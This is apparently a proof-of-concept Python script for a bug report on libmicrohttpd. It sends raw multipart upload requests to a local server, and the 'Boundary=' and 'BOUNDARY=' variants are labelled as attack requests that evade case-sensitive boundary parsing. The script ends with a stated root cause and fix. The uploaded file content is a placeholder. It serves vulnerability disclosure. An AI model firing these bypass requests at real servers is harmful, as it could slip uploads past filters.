#!/usr/bin/env python3 import socket import time TARGET = "127.0.0.1" PORT = 8888 BODY = ( b"--BOUNDARY123\r\n" b"Content-Disposition: form-data; name=\"secret_file\"; filename=\"malware.exe\"\r\n" b"Content-Type: application/octet-stream\r\n" b"\r\n" b"MALICIOUS_PAYLOAD_DATA\r\n" b"--BOUNDARY123--\r\n" ) def send_raw(label, content_type_header): request = ( f"POST /upload HTTP/1.1\r\n" f"Host: {TARGET}:{PORT}\r\n" f"Content-Type: {content_type_header}\r\n" f"Content-Length: {len(BODY)}\r\n" f"Connection: close\r\n" f"\r\n" ).encode() + BODY s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET, PORT)) s.sendall(request) time.sleep(0.2) resp = b"" while True: chunk = s.recv(4096) if not chunk: break resp += chunk s.close() status_line = resp.split(b"\r\n")[0].decode() print(f" [{label}]") print(f" Content-Type: {content_type_header}") print(f" Server response: {status_line}") print() print("=" * 60) print("libmicrohttpd boundary= case-sensitivity bypass PoC") print("RFC 2046 §4.1 violation in postprocessor.c:82") print("=" * 60) print() print("--- NORMAL REQUEST (boundary= lowercase) ---") send_raw("boundary=", "multipart/form-data; boundary=BOUNDARY123") time.sleep(0.3) print("--- ATTACK REQUEST 1 (Boundary= capitalized) ---") send_raw("Boundary=", "multipart/form-data; Boundary=BOUNDARY123") time.sleep(0.3) print("--- ATTACK REQUEST 2 (BOUNDARY= all caps) ---") send_raw("BOUNDARY=", "multipart/form-data; BOUNDARY=BOUNDARY123") time.sleep(0.3) print("ROOT CAUSE: postprocessor.c:82 strstr(boundary, \"boundary=\")") print("Developer TODO: /* Q: should this be strcasestr? */") print("Fix: case-insensitive search per RFC 2046 §4.1")